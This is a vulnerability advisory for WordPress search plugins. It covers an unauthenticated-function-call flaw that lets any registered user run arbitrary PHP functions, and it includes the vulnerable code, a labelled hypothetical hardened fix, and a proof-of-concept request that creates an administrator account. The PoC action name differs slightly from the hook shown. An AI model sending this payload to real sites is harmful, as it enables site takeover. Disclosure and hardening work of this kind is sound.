ajax-search-pro & ajax-search-lite.txt
WordPress ajax-search-pro Plugin Remote Code Execution
[-] Plugin Link:
http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410
Also affected:
https://wordpress.org/plugins/ajax-search-lite/
https://wordpress.org/plugins/related-posts-lite/
[-] Vulnerability Description:
This vulnerability allows any registered user to execute arbitrary functions.
Vulnerable code:
add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
    function wpdreams_ajaxinputcallback() {
        $param = $_POST;
        // function name taken straight from the request; no nonce, no capability check, no allowlist
        echo call_user_func($_POST['wpdreams_callback'], $param);
        exit;
    }
}
This allows any registered user to call any function he wants, with the $_POST array passed as the first parameter.
Since WordPress core provides functions that accept an array as their first parameter, wp_insert_user() can be reached this way; its "role" option sets the role of the user being inserted, so a new administrator can be created.
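For comparison, below is a hardened version of the same AJAX handler. It is an added example written for this page, not the vendor's fix or plugin code: the helper names wpdreams_suggest_terms and wpdreams_preview_results, the nonce action "wpdreams-ajaxinput" and the request field wpdreams_nonce are assumptions. It assumes WordPress core is loaded (add_action, check_ajax_referer, current_user_can, sanitize_key, wp_unslash and wp_send_json_* are core functions). The three changes that close the hole are: a nonce check, a capability check appropriate to a settings page, and resolving the requested callback through a fixed allowlist instead of passing request data to call_user_func().

```php
<?php
// Hardened replacement for wpdreams_ajaxinputcallback (hypothetical example, not the vendor's fix).
// Assumes WordPress is loaded; wpdreams_suggest_terms / wpdreams_preview_results are assumed plugin helpers.

add_action( 'wp_ajax_wpdreams-ajaxinput', 'wpdreams_ajaxinputcallback_hardened' );

/**
 * Fixed map of client-visible names to the functions they may invoke.
 * The request selects a key; a raw function name from the request is never executed.
 */
function wpdreams_allowed_callbacks() {
    return array(
        'suggest' => 'wpdreams_suggest_terms',   // hypothetical plugin helper
        'preview' => 'wpdreams_preview_results', // hypothetical plugin helper
    );
}

function wpdreams_ajaxinputcallback_hardened() {
    // 1. CSRF: the settings page must emit wp_nonce_field( 'wpdreams-ajaxinput', 'wpdreams_nonce' ).
    //    check_ajax_referer() terminates the request with HTTP 403 when the nonce is missing or invalid.
    check_ajax_referer( 'wpdreams-ajaxinput', 'wpdreams_nonce' );

    // 2. Authorization: a handler reached from the plugin's settings page should require the
    //    capability that page requires, not merely a logged-in session (any subscriber).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 ); // sends JSON and exits
    }

    // 3. Allowlist: sanitize_key() reduces the input to [a-z0-9_-]; then it must be a known key
    //    whose target actually exists. wp_insert_user or any other core function is unreachable.
    $allowed = wpdreams_allowed_callbacks();
    $name    = isset( $_POST['wpdreams_callback'] )
        ? sanitize_key( wp_unslash( $_POST['wpdreams_callback'] ) )
        : '';
    if ( ! isset( $allowed[ $name ] ) || ! function_exists( $allowed[ $name ] ) ) {
        wp_send_json_error( 'unknown callback', 400 );
    }

    // 4. Pass only the fields the callback needs, never the whole $_POST array.
    $param = array(
        'term' => isset( $_POST['term'] ) ? sanitize_text_field( wp_unslash( $_POST['term'] ) ) : '',
    );

    wp_send_json_success( call_user_func( $allowed[ $name ], $param ) );
}
```

With this structure a request carrying wpdreams_callback=wp_insert_user fails at step 3 with HTTP 400 even if it somehow passed the nonce and capability checks, and a low-privilege account fails at step 2. When reviewing other plugins for the same pattern, the thing to search for is call_user_func / call_user_func_array whose first argument derives from $_GET, $_POST or $_REQUEST inside a wp_ajax_ handler.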
[-] Proof of Concept:
This registers an administrator with username "xADMIN" and password "xPASS":
url: http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinputpost
data: wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
[-] Timeline:
09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure